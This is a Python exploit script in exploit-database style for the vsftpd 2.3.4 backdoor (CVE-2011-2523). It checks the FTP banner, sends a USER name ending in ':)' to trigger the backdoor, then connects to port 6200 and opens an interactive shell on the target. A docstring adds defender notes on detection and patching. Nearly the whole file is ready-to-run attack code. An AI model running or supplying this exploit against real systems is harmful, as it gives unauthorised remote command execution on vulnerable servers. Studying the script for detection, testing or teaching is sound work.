#!/usr/bin/python3
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 28-11-2023
# Exploit Author: Sheikh Mohammad Hasan (4m3rr0r)
# Version: vsftpd 2.3.4
# CVE : CVE-2011-2523
from pwn import *
import sys
import getopt
from time import sleep
class ExploitFTP:
    """Two-step client for the vsftpd 2.3.4 backdoor named in the file header.

    Step one (`trigger_backdoor`) reads the FTP greeting, confirms that the
    advertised version is exactly "2.3.4" and sends a USER/PASS pair whose
    user name ends in ":)". Step two (`get_shell`) opens a second TCP
    connection to port 6200 on the same host.

    Defender notes, taken from what this code puts on the wire: an FTP
    ``USER`` argument containing ":)" followed by a connection to TCP 6200
    on the FTP host is the observable pattern. The version check relies
    only on the greeting banner, so a rewritten banner hides a host from
    this script without making it safe. The fix is to replace the affected
    vsftpd 2.3.4 build with a verified release (CVE-2011-2523); filtering
    inbound TCP 6200 is a stop-gap.
    """

    def __init__(self, ip, port=21):
        """Remember the target address and create the progress logger."""
        self.ip, self.port = ip, port
        # One pwntools progress line is reused for every status update.
        self.p = log.progress("")

    def trigger_backdoor(self):
        """Check the banner version, then send the USER/PASS pair.

        Exits the process when the banner does not report 2.3.4 or when any
        network step raises.
        """
        try:
            self.p.status("Checking Version...")
            conn = remote(self.ip, self.port)
            # The version is the text between "vsFTPd " and the next ")".
            conn.recvuntil(b"vsFTPd ")
            banner_tail = conn.recvuntil(b")")
            version = banner_tail[:-1].decode()
            if version != "2.3.4":
                self.p.failure("Version 2.3.4 Not Found!!!")
                exit()
            self.p.status("Triggering Backdoor....")
            for command in (b"USER hello:)", b"PASS hello123"):
                conn.sendline(command)
            # The control connection is not needed after the login attempt.
            conn.close()
        except Exception as err:
            self.p.failure(f"An error occurred: {err}")
            exit()

    def get_shell(self):
        """Connect to TCP 6200 on the target and hand the session to the user.

        Exits the process when the connection cannot be established.
        """
        try:
            self.p.status("Connecting To Backdoor...")
            # Short pause before connecting to the second port.
            sleep(1)
            session = remote(self.ip, 6200)
            self.p.success("Got Shell!!!")
            session.interactive()
            session.close()
        except Exception as err:
            self.p.failure(f"An error occurred: {err}")
            exit()
def display_help():
    """Print the command-line usage summary to standard output."""
    help_lines = [
        f"Usage: {sys.argv[0]} -t IP [-p PORT]",
        "Options:",
        " -h, --help\t\tShow this help message and exit",
        " -t IP\t\t\tTarget IP address",
        " -p PORT\t\tTarget port (default is 21)",
    ]
    print("\n".join(help_lines))
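if __name__ == "__main__":
    # Command-line entry point: parse -t/-p, validate them, then run the two
    # phases of ExploitFTP in order.
    target_ip = None
    target_port = 21

    try:
        opts, _unused_args = getopt.getopt(sys.argv[1:], "ht:p:", ["help"])
    except getopt.GetoptError:
        display_help()
        sys.exit(1)

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            display_help()
            sys.exit(0)
        if opt == "-t":
            target_ip = arg
        elif opt == "-p":
            # A non-numeric or out-of-range port previously surfaced as an
            # uncaught ValueError or a late socket error; reject it here.
            try:
                target_port = int(arg)
            except ValueError:
                target_port = -1
            if not 1 <= target_port <= 65535:
                print("Port must be an integer between 1 and 65535.", file=sys.stderr)
                display_help()
                sys.exit(1)

    if target_ip is None:
        # pwntools' error() logs the message and then raises, so the help text
        # after it was never shown; report on stderr and exit explicitly.
        print("Target IP is required. Use -t option.", file=sys.stderr)
        display_help()
        sys.exit(1)

    try:
        exploit = ExploitFTP(target_ip, target_port)
        exploit.trigger_backdoor()
        exploit.get_shell()
    except KeyboardInterrupt:
        print("\nUser interrupted the execution.")
        sys.exit(1)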